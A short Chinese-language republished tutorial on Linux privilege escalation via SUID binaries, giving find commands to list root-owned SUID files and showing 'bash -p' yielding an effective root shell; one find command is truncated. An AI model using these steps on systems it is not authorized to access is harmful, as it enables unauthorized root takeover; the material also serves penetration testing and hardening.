首页 > 运维 > linux运维 > Linux下如何利用SUID提权

Linux下如何利用SUID提权

WBOY
发布: 2023-05-23 23:52:05
转载
1811 人浏览过

SUID是Linux的一种权限机制,具有这种权限的文件会在其执行时,使调用者暂时获得该文件拥有者的权限。如果拥有SUID权限,那么就可以利用系统中的二进制文件和工具来进行root提权。

以下命令可以发现系统上运行的所有SUID可执行文件。具体来说,命令将尝试查找具有root权限的SUID的文件。

find / -user root -perm -4000 -print 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
find / -user root -perm -4000 -exec ls
登录后复制

Linux下如何利用SUID提权

 

Linux下如何利用SUID提权

 以上所有二进制文件都将以root用户权限执行,因为它们的权限中包含"s",并且对应的是root权限。

Bash

以下命令将以root权限打开一个bash shell。

bash -p
bash-3.2# id
uid=1002(service) gid=1002(service) euid=0(root) groups=1002(service)
登录后复制

Linux下如何利用SUID提权

以上是Linux下如何利用SUID提权的详细内容。更多信息请关注PHP中文网其他相关文章!

相关标签:
来源:yisu.com
本站声明
本文内容由网友自发贡献,版权归原作者所有,本站不承担相应法律责任。如您发现有涉嫌抄袭侵权的内容,请联系admin@php.cn
热门教程
更多>
最新下载
更多>
网站特效
网站源码
网站素材
前端模板